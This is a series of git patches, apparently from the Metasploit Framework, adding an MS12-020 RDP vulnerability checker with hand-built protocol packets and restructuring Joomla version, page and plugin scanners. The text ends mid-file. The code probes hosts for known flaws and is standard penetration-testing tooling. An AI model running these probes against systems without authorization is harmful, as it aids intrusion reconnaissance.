.../auxiliary/scanner/rdp/ms12-02_check.rb | 194 ++++++++++++++++++ 1 file changed, 194 insertions(+) create mode 100644 modules/auxiliary/scanner/rdp/ms12-02_check.rb diff --git a/modules/auxiliary/scanner/rdp/ms12-02_check.rb b/modules/auxiliary/scanner/rdp/ms12-02_check.rb new file mode 100644 index 000000000000..da7d4589624d --- /dev/null +++ b/modules/auxiliary/scanner/rdp/ms12-02_check.rb @@ -0,0 +1,194 @@ + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS12-020 Microsoft Remote Desktop Checker', + 'Description' => %q{ + This module checks a range of hosts for the MS12-020 vulnerability. + This does not cause a DoS on the target. + }, + 'References' => + [ + [ 'CVE', '2012-0002' ], + [ 'MSB', 'MS12-020' ], + [ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/ms12-020' ], + [ 'EDB', '18606' ], + [ 'URL', 'https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse' ] + ], + 'Author' => + [ + 'Royce Davis @R3dy_ <rdavis[at]accuvant.com>', + 'Brandon McCann @zeknox <bmccann[at]accuvant.com>' + ], + 'License' => MSF_LICENSE, + )) + + register_options( + [ + OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]), + ], self.class) + end + + def checkRdp(packet) + # code to check if RDP is open or not + vprint_status("#{peer} - Verifying RDP Protocol") + begin + # send connection + sock.put(packet) + # read packet to see if its rdp + res = sock.recv(1024) + + if res.unpack("H*").join == "0300000b06d00000123400" + return true + else + return false + end + rescue + print_error("could not connect to RHOST") + return false + end + end + + def connectionRequest() + packet = '' + + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options + return packet + end + + def report_goods + report_vuln( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'The MS12-020 Checker', + :vuln => 'Confirmaiton that this host is vulnerable to MS12-020', + :refs => self.references, + :exploited_at => Time.now.utc + ) + end + + def connectInitial() + packet = '' + + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData + return packet + end + + def userRequest() + packet = '' + + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents + return packet + end + + def channelRequestOne + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x01\x03\xeb" + return packet + end + + def channelRequestTwo + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x02\x03\xeb" + return packet + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + begin + # open connection + connect() + rescue + return + end + + # check if rdp is open + if checkRdp(connectionRequest) + + # send connectInitial + sock.put(connectInitial) + # send userRequest + sock.put(userRequest) + user1_res = sock.recv(1024) + # send 2nd userRequest + sock.put(userRequest) + user2_res = sock.recv(1024) + # send channel request one + sock.put(channelRequestOne) + channel_one_res = sock.recv(1024) + if channel_one_res.unpack("H*").to_s[16..19] == '3e00' + # vulnerable + print_good("#{peer} - Vulnerable MS12-020") + report_goods + + # send ChannelRequestTwo - prevent bsod + sock.put(channelRequestTwo) + + # report to the database + else + vprint_error("#{peer} - Not Vulnerable") + end + + end + # close connection + disconnect() + end + +end + From 8578e7cf8541cee0bf542fcf5a07c5d3ccc7ec73 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 11:55:54 -0600 Subject: [PATCH 164/421] renamed file --- .../auxiliary/scanner/rdp/{ms12-02_check.rb => ms12-020_check.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/rdp/{ms12-02_check.rb => ms12-020_check.rb} (100%) diff --git a/modules/auxiliary/scanner/rdp/ms12-02_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb similarity index 100% rename from modules/auxiliary/scanner/rdp/ms12-02_check.rb rename to modules/auxiliary/scanner/rdp/ms12-020_check.rb From 3742fd5a17c909303c76162c71468b4083017b74 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 11:58:04 -0600 Subject: [PATCH 165/421] duplicate include --- modules/auxiliary/scanner/rdp/ms12-020_check.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index da7d4589624d..5e2aa8dcc42a 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -4,7 +4,6 @@ class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report From 4824d11ff37e1e89e02c9c270d4ae1c70229d1a7 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 12:14:41 -0600 Subject: [PATCH 166/421] removed white space --- modules/auxiliary/scanner/rdp/ms12-020_check.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index 5e2aa8dcc42a..cd991f7005a0 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -1,5 +1,3 @@ - - require 'msf/core' class Metasploit3 < Msf::Auxiliary From 7d4e7676ced690dd1851070e22e01edc103b0ded Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 25 Jan 2013 13:04:20 -0600 Subject: [PATCH 167/421] This file has a MSF license, needs the header --- modules/auxiliary/scanner/rdp/ms12-020_check.rb | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index cd991f7005a0..5d3ef5185954 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -31,7 +38,7 @@ def initialize(info = {}) register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]), + OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) ], self.class) end From 0a4fadcb098d2eadc7a646bb8be101b91ee8a4c2 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 25 Jan 2013 13:07:13 -0600 Subject: [PATCH 168/421] Comments don't seem to align properly w/ tabs --- .../auxiliary/scanner/rdp/ms12-020_check.rb | 92 +++++++++---------- 1 file changed, 46 insertions(+), 46 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index 5d3ef5185954..93dc4bc58ab8 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -64,13 +64,13 @@ def checkRdp(packet) def connectionRequest() packet = '' + - "\x03\x00" + # TPKT Header version 03, reserved 0 - "\x00\x0b" + # Length - "\x06" + # X.224 Data TPDU length - "\xe0" + # X.224 Type (Connection request) - "\x00\x00" + # dst reference - "\x00\x00" + # src reference - "\x00" # class and options + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options return packet end @@ -88,49 +88,49 @@ def report_goods def connectInitial() packet = '' + - "\x03\x00\x00\x65" + # TPKT Header - "\x02\xf0\x80" + # Data TPDU, EOT - "\x7f\x65\x5b" + # Connect-Initial - "\x04\x01\x01" + # callingDomainSelector - "\x04\x01\x01" + # callingDomainSelector - "\x01\x01\xff" + # upwardFlag - "\x30\x19" + # targetParams + size - "\x02\x01\x22" + # maxChannelIds - "\x02\x01\x20" + # maxUserIds - "\x02\x01\x00" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x18" + # minParams + size - "\x02\x01\x01" + # maxChannelIds - "\x02\x01\x01" + # maxUserIds - "\x02\x01\x01" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x01\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x19" + # maxParams + size - "\x02\x01\xff" + # maxChannelIds - "\x02\x01\xff" + # maxUserIds - "\x02\x01\xff" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x04\x00" # userData + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData return packet end def userRequest() packet = '' + - "\x03\x00" + # header - "\x00\x08" + # length - "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) - "\x28" # PER encoded PDU contents + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents return packet end @@ -178,7 +178,7 @@ def run_host(ip) channel_one_res = sock.recv(1024) if channel_one_res.unpack("H*").to_s[16..19] == '3e00' # vulnerable - print_good("#{peer} - Vulnerable MS12-020") + print_good("#{peer} - Vulnerable to MS12-020") report_goods # send ChannelRequestTwo - prevent bsod From 0490b4a853a076ef11e88b8f10fffa1d4603c5c0 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 25 Jan 2013 13:18:28 -0600 Subject: [PATCH 169/421] I wanna know where this thing is stored. --- modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index e28eaa05620b..abe5c91903f2 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -100,6 +100,7 @@ def run_host(ip) fname = datastore['PATH'].gsub(/[\/\\]/, '_') p = store_loot("titanftp.traversal", "text/plain", "rhost", file_data, fname) + print_status("Saved in: #{p}") vprint_status(file_data.inspect) disconnect From d6e9f891ea566c316cf398abe0a507019544a28d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 25 Jan 2013 20:44:49 +0100 Subject: [PATCH 170/421] Proposal for joomla-scanner --- .../auxiliary/scanner/http/joomla_pages.rb | 109 +++++++ .../auxiliary/scanner/http/joomla_plugins.rb | 175 ++++++++++ .../auxiliary/scanner/http/joomla_version.rb | 176 ++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 303 ------------------ 4 files changed, 460 insertions(+), 303 deletions(-) create mode 100755 modules/auxiliary/scanner/http/joomla_pages.rb create mode 100755 modules/auxiliary/scanner/http/joomla_plugins.rb create mode 100755 modules/auxiliary/scanner/http/joomla_version.rb delete mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb new file mode 100755 index 000000000000..77218063a5af --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for common pages. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + pages = [ + 'robots.txt', + 'administrator/index.php', + 'admin/', + 'index.php/using-joomla/extensions/components/users-component/registration-form', + 'index.php/component/users/?view=registration', + 'htaccess.txt' + ] + + vprint_status("#{peer} - Checking for interesting pages") + pages.each do |page| + scan_pages(tpath, page, ip) + end + + end + + def scan_pages(tpath, page, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{page}", + 'method' => 'GET', + }) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + note = "Page Found" + if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + note = "Administrator Login Page" + elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + note = "Registration Page" + end + + print_good("#{peer} - #{note}: #{tpath}#{page}") + + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "#{note}: #{tpath}#{page}", + :update => :unique_data + ) + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") + end + end + + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb new file mode 100755 index 000000000000..37dff56fd4ca --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -0,0 +1,175 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Plugins Scanner', + 'Description' => %q{ + This module scans a Joomla install for plugins and potential + vulnerabilities. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), + OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")]) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + vprint_status("#{peer} - Checking for interesting plugins") + res = send_request_cgi({ + 'uri' => tpath, + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |line| + papp = line.chomp + plugin_search(tpath, papp, ip, res.body.size) + end + end + + def plugin_search(tpath, papp, ip, osize) + res = send_request_cgi({ + 'uri' => "#{tpath}#{papp}", + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + nsize = res.body.size + + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") + report_note( + :host => ip, + :port => rport, + :proto => 'http', + :ntype => 'joomla_plugin', + :data => "#{tpath}#{papp}", + :update => :unique_data + ) + + if (papp =~/passwd/ and res.body =~/root/) + print_good("#{peer} - Vulnerability: Potential LFI") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'root' signature", + :risk => 1, + :confidence => 10, + :category => 'Local File Inclusion', + :description => "Joomla: Potential LFI at #{tpath}#{papp}", + :name => 'Local File Inclusion' + ) + elsif (res.body =~/SQL syntax/) + print_good("#{peer} - Vulnerability: Potential SQL Injection") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'SQL syntax' signature", + :risk => 1, + :confidence => 10, + :category => 'SQL Injection', + :description => "Joomla: Potential SQLI at #{tpath}#{papp}", + :name => 'SQL Injection' + ) + elsif (papp =~/>alert/ and res.body =~/>alert/) + print_good("#{peer} - Vulnerability: Potential XSS") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the '>alert' signature", + :risk => 1, + :confidence => 10, + :category => 'Cross Site Scripting', + :description => "Joomla: Potential XSS at #{tpath}#{papp}", + :name => 'Cross Site Scripting' + ) + elsif (papp =~/com_/) + vars = papp.split('_') + pages = vars[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => "#{tpath}index.php?option=com_#{pages}", + 'method' => 'GET' + }) + if (res1.code == 200) + print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "Page: #{tpath}index.php?option=com_#{pages}", + :update => :unique_data + ) + else + vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + end + end + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} ip access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") + end + end + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb new file mode 100755 index 000000000000..5ccdfe89d763 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -0,0 +1,176 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for information about the underlying + operating system and Joomla version. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def os_fingerprint(response) + if not response.headers.has_key?('Server') + return "Unkown OS (No Server Header)" + end + + case response.headers['Server'] + when /Win32/ + when /\(Windows/ + when /IIS/ + os = "Windows" + when /Apache\// + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + return os + end + + def fingerprint(response) + case response.body + when /<version.*\/?>(.+)<\/version\/?>/i + v = $1 + out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ + when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ + when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ + when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ + when /20196 2011\-01\-09 02\:40\:25Z ian/ + out = "1.6" + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / + when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ + when /22183 2011\-09\-30 09\:04\:32Z infograf768/ + when /21660 2011\-06\-23 13\:25\:32Z infograf768/ + out = "1.7" + when /Joomla! 1.5/ + when /MooTools\=\{version\:\'1\.12\'\}/ + when /11391 2009\-01\-04 13\:35\:50Z ian/ + out = "1.5" + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/ + when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + out = "2.5" + when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/ + out = $1.split(/,/)[0] + when /(Copyright \(C\) 2005 - 200(6|7))/ + when /47 2005\-09\-15 02\:55\:27Z rhuk/ + when /423 2005\-10\-09 18\:23\:50Z stingrey/ + when /1005 2005\-11\-13 17\:33\:59Z stingrey/ + when /1570 2005\-12\-29 05\:53\:33Z eddieajau/ + when /2368 2006\-02\-14 17\:40\:02Z stingrey/ + when /4085 2006\-06\-21 16\:03\:54Z stingrey/ + when /4756 2006\-08\-25 16\:07\:11Z stingrey/ + when /5973 2006\-12\-11 01\:26\:33Z robs/ + when /5975 2006\-12\-11 01\:26\:33Z robs/ + out = "1.0" + else + out = 'Unknown Joomla' + end + return out + end + + def check_file(tpath, file, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{file}", + 'method' => 'GET' + }) + + return :abort if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + os = os_fingerprint(res) + out = fingerprint(res) + return false if not out + + if(out =~ /Unknown Joomla/) + print_error("#{peer} - Unable to identify Joomla Version with #{file}") + return false + else + print_good("#{peer} - Joomla Version:#{out} from: #{file} ") + print_good("#{peer} - OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_version', + :data => out + ) + return true + end + elsif (res.code == 403) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") + end + return :abort + end + + return false + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + files = [ + 'language/en-GB/en-GB.xml', + 'templates/system/css/system.css', + 'media/system/js/mootools-more.js', + 'language/en-GB/en-GB.ini', + 'htaccess.txt', + 'language/en-GB/en-GB.com_media.ini' + ] + + vprint_status("#{peer} - Checking Joomla version") + files.each do |file| + joomla_found = check_file(tpath, file, ip) + return if joomla_found == :abort + break if joomla_found + end + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb deleted file mode 100755 index 2ad9d2f040d9..000000000000 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ /dev/null @@ -1,303 +0,0 @@ -## -# $Id: joomla_vulnscan.rb -## -## -# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples. -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'Joomla Scanner', - 'Description' => %q{ - This module scans a Joomla install for information, plugins and potential vulnerabilites. - }, - 'Author' => [ 'newpid0' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), - OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), - - OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", - File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt") - ] - ) - - ], self.class) - end - - def osfingerprint(response) - if(response.headers.has_key?('Server') ) - if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) - os = "Windows" - elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) - os = "*Nix" - else - os = "Unknown Server Header Reporting: "+response.headers['Server'] - end - end - return os - end - - def fingerprint(response) - if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i) - v = $1 - out = (v 